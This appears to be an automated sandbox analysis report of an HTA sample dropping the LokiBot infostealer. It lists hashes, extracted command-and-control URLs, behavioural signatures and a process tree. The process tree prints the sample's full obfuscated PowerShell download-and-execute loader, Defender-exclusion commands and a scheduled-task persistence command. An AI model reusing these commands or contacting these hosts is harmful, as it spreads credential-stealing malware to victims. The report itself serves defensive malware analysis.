Analysis
-
max time kernel
133s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
19-11-2024 02:13
Static task
static1
Behavioral task
behavioral1
Sample
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta
Resource
win10v2004-20241007-en
General
-
Target
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta
-
Size
178KB
-
MD5
e80a6dc30c45134e8c433ef07277022f
-
SHA1
9041ab7b0cf03e4c18f86ff32eac95c3ad06f462
-
SHA256
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182
-
SHA512
6156f6fcb24fedaabb7d1d62a0ff71e7bd8c6ab194c1a5c1b7ccc25644ba36dd62a79a8989dba98015044502a64db5c32187b802cc42dc964f25323c352519d8
-
SSDEEP
96:4vCl17nlkfktbLVe4I9qWs5cew1WyNk6O5Q:4vCldn+s9he4CqWj26O5Q
Malware Config
Extracted
lokibot
http://94.156.177.95/simple/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
Processes:
pOwersheLl.eXeflow pid process 3 2796 pOwersheLl.eXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 1008 powershell.exe 1296 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
Processes:
pOwersheLl.eXepowershell.exepid process 2796 pOwersheLl.eXe 2744 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
caspol.execaspol.exepid process 3048 caspol.exe 1148 caspol.exe -
Loads dropped DLL 3 IoCs
Processes:
pOwersheLl.eXepid process 2796 pOwersheLl.eXe 2796 pOwersheLl.eXe 2796 pOwersheLl.eXe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
caspol.exedescription pid process target process PID 3048 set thread context of 1148 3048 caspol.exe caspol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
pOwersheLl.eXepowershell.execsc.execvtres.exepowershell.exepowershell.exemshta.execaspol.exeschtasks.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOwersheLl.eXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caspol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
pOwersheLl.eXepowershell.exepowershell.exepowershell.exepid process 2796 pOwersheLl.eXe 2744 powershell.exe 1008 powershell.exe 1296 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
pOwersheLl.eXepowershell.exepowershell.exepowershell.execaspol.exedescription pid process Token: SeDebugPrivilege 2796 pOwersheLl.eXe Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 1008 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1148 caspol.exe -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
mshta.exepOwersheLl.eXecsc.execaspol.exedescription pid process target process PID 2272 wrote to memory of 2796 2272 mshta.exe pOwersheLl.eXe PID 2272 wrote to memory of 2796 2272 mshta.exe pOwersheLl.eXe PID 2272 wrote to memory of 2796 2272 mshta.exe pOwersheLl.eXe PID 2272 wrote to memory of 2796 2272 mshta.exe pOwersheLl.eXe PID 2796 wrote to memory of 2744 2796 pOwersheLl.eXe powershell.exe PID 2796 wrote to memory of 2744 2796 pOwersheLl.eXe powershell.exe PID 2796 wrote to memory of 2744 2796 pOwersheLl.eXe powershell.exe PID 2796 wrote to memory of 2744 2796 pOwersheLl.eXe powershell.exe PID 2796 wrote to memory of 2576 2796 pOwersheLl.eXe csc.exe PID 2796 wrote to memory of 2576 2796 pOwersheLl.eXe csc.exe PID 2796 wrote to memory of 2576 2796 pOwersheLl.eXe csc.exe PID 2796 wrote to memory of 2576 2796 pOwersheLl.eXe csc.exe PID 2576 wrote to memory of 1740 2576 csc.exe cvtres.exe PID 2576 wrote to memory of 1740 2576 csc.exe cvtres.exe PID 2576 wrote to memory of 1740 2576 csc.exe cvtres.exe PID 2576 wrote to memory of 1740 2576 csc.exe cvtres.exe PID 2796 wrote to memory of 3048 2796 pOwersheLl.eXe caspol.exe PID 2796 wrote to memory of 3048 2796 pOwersheLl.eXe caspol.exe PID 2796 wrote to memory of 3048 2796 pOwersheLl.eXe caspol.exe PID 2796 wrote to memory of 3048 2796 pOwersheLl.eXe caspol.exe PID 3048 wrote to memory of 1008 3048 caspol.exe powershell.exe PID 3048 wrote to memory of 1008 3048 caspol.exe powershell.exe PID 3048 wrote to memory of 1008 3048 caspol.exe powershell.exe PID 3048 wrote to memory of 1008 3048 caspol.exe powershell.exe PID 3048 wrote to memory of 1296 3048 caspol.exe powershell.exe PID 3048 wrote to memory of 1296 3048 caspol.exe powershell.exe PID 3048 wrote to memory of 1296 3048 caspol.exe powershell.exe PID 3048 wrote to memory of 1296 3048 caspol.exe powershell.exe PID 3048 wrote to memory of 1152 3048 caspol.exe schtasks.exe PID 3048 wrote to memory of 1152 3048 caspol.exe schtasks.exe PID 3048 wrote to memory of 1152 3048 caspol.exe schtasks.exe PID 3048 wrote to memory of 1152 3048 caspol.exe schtasks.exe PID 3048 wrote to memory of 1148 3048 caspol.exe caspol.exe PID 3048 wrote to memory of 1148 3048 caspol.exe caspol.exe PID 3048 wrote to memory of 1148 3048 caspol.exe caspol.exe PID 3048 wrote to memory of 1148 3048 caspol.exe caspol.exe PID 3048 wrote to memory of 1148 3048 caspol.exe caspol.exe PID 3048 wrote to memory of 1148 3048 caspol.exe caspol.exe PID 3048 wrote to memory of 1148 3048 caspol.exe caspol.exe PID 3048 wrote to memory of 1148 3048 caspol.exe caspol.exe PID 3048 wrote to memory of 1148 3048 caspol.exe caspol.exe PID 3048 wrote to memory of 1148 3048 caspol.exe caspol.exe -
outlook_office_path 1 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe"C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'JFo3VE02ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFckRFZmluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnJwdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGaUVJdnlPaGJJcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWVCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPZ2NBUnYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo3VE02OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjQzLjEzNi8zNy9jYXNwb2wuZXhlIiwiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUiLDAsMCk7c1RBUlQtc0xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjYXNwb2wuZXhlIg=='+[CHAr]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yuimw6-o.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF171.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF170.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:1740
-
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA5FF.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1152
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1148
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57da0c315186d515b9879e0aaa29c4079
SHA1fe98f46571f9405f3fff1226b5b0a989cbe6cc2b
SHA256b4914d0c7cd64e2c57e207770c2d2a910310b9d949704c372ced33b1e9912158
SHA512f27d9c45fd33e33ee4d7584431d34e1424354298acbc23dccf59cf79adb1cd1dc00edf7334346d6a8b3bc3b9f964f95df3c7abd60ea53b751d8c1b1346589f67
-
Filesize
1KB
MD5ca87c471a032441db525a366f9589d2b
SHA14a29befb8acf406b4c19fed78b6ded2c8371a780
SHA256d56e225da24985c6a8d2b795907c7ef8aac344238939b4c785114c605b871a0c
SHA51286846da01561807a9bc483960fe06848453927434a2a671365eeb51d58fd947b3caa65b05616ea2b20ce3f2f2cc07a60fd06f094be3f937c8182d0971c35b680
-
Filesize
3KB
MD59c009b633651fa2bcc7380066ed7a5ff
SHA1885c854e81006873524bdb82ee25f71011a73363
SHA256b2c124fa8a1c500ec0ea177a4383a5acf20bd75594dc50c6ac8e20b8e9e6bcab
SHA512e04b0d909fc2e0b08eabdbc39fa1471cb45dc0e93e9334092576af34f10deddb4771c70c032d628b245c9519d5c6830025ffed096a634d5b6fee05a743814855
-
Filesize
7KB
MD5fa50cd9aca039796b38569e42c251468
SHA19e8a1650f11f9bdf15c8738796e9ae87c4e0587a
SHA2567f4f0a4798eaf09356f75bf39335b7939d73e63a49eb925651aaa6133589f32a
SHA512a3a8c50fa76efd386d207e496a1789d4231c82118bb9571c3e9858bf153d499685dd29708c3a426ad77bcf43b8fe419f84dbc481e91581fae9f40febcb17ff48
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3551809350-4263495960-1443967649-1000\0f5007522459c86e95ffcc62f32308f1_5a410d66-f84f-4a6b-9b29-3982febe58d9
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3551809350-4263495960-1443967649-1000\0f5007522459c86e95ffcc62f32308f1_5a410d66-f84f-4a6b-9b29-3982febe58d9
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5821a81e771be65fe5954204db1940d16
SHA1538ae2032f6bab8c1c1ed2e68ccb7d251eaa99fd
SHA2560e19f95bc58e413f146a01dd089b761725ac00ce7b48f8285cac491be0d088a0
SHA512fc79fa09cf80e6e271a4b913b7258551c22651344008a5466180076822129bb11c3dcdcfd179ab48de7cce3e3c57e1cd8afae40783e4c8caa866ca6769f3f05d
-
Filesize
568KB
MD5318ff90d7a2797a041b836f7f8900f62
SHA1fdda6afed7a1643ae353e7a635e6744c2b0a07d5
SHA256241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430
SHA512808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD5fdb387ca27e2ece9af03ca86ac1eaaeb
SHA19a00a50a6170e22078c82362159af329a0f89e9d
SHA256dd8664c20f544fcabbf200920c8e349f8ee87d66ecf6c84a5ba507007b9bec07
SHA512aa0e5c6e04a0eb7c0a30605b1e000ba725a20c2092098dd747d7935268dc5d6d30fffcc16448b92ebef6fca3b0d7ff1e4a58af1a36dd010ba711acd1e46a9feb
-
Filesize
464B
MD5f8419bbc398e1a2b134eec88b333f8f6
SHA157ebba4cad00272da80b919df0908ec40f9be48a
SHA25625fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3
SHA512b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674
-
Filesize
309B
MD5102a60e666c0d1086ff3c9e32b182e02
SHA175bb8fb4d160feddf56a030335210770fb0e3ab9
SHA256995f8c3a0331cfdb8db587dbda38ba69c4948e8592d51c8eece66cd886e6a6ac
SHA51246a9e5a197b65e784ec4dad44015af35c3db8c7c3b77a4d6695890f0c372b746dad3dab8090195305cc51f6c7296f5ed6ece79bcc1078ae94d5332b006bccc59